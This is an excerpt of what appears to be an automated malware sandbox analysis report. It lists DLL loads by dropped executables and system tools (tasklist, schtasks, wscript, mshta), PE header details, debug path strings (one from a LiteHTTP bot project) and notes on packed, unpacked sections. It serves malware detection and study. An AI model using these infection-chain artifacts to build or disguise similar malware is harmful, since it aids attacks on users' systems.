                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: webio.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
                                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comSection loaded: rasadhlp.dll
                                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\choice.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: edgegdi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: powrprof.dll
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeSection loaded: umpdc.dll
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: QkRFz2sau5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 935372fb1f.exe, 00000010.00000002.22377836357.0000000000410000.00000040.00000001.01000000.00000013.sdmp, 935372fb1f.exe, 00000010.00000003.22357417975.0000000004A0F000.00000004.00001000.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22773040664.0000000000410000.00000040.00000001.01000000.0000001E.sdmp, c7f37422c5.exe, 00000032.00000003.22752671703.00000000049FF000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdbH^ source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdb source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.8\Bot\LiteHTTP\obj\x86\Debug\SystemHelper.pdb source: skotes.exe, 0000000E.00000002.23301841769.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 935372fb1f.exe, 00000010.00000002.22379704767.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22775648056.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 935372fb1f.exe, 00000010.00000002.22391402178.0000000007426000.00000004.00000020.00020000.00000000.sdmp, 935372fb1f.exe, 00000010.00000002.22383262104.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22789634880.00000000073FB000.00000004.00000020.00020000.00000000.sdmp, c7f37422c5.exe, 00000032.00000002.22782201415.00000000052C9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: BitLockerToGo.pdbGCTL source: 33c3d7c7bd.exe, 00000023.00000002.22885525568.000000000A280000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: em.pdb source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Bedroom.pdb source: f891ed3167.exe, 00000024.00000000.22557531054.0000000000912000.00000002.00000001.01000000.00000019.sdmp, f891ed3167.exe, 00000024.00000002.22603526519.0000000003D99000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: .pdbTw source: powershell.exe, 00000009.00000002.22110805513.000001D3449AF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Battery.pdb source: f8e8a2d2f0.exe, 0000002A.00000002.22650688983.0000000004289000.00000004.00000800.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002A.00000000.22619514498.0000000000DD2000.00000002.00000001.01000000.0000001C.sdmp
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: QkRFz2sau5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEUnpacked PE file: 11.2.Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 12.2.skotes.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rtrxnzik:EW;vyhzfbjm:EW;.taggant:EW;
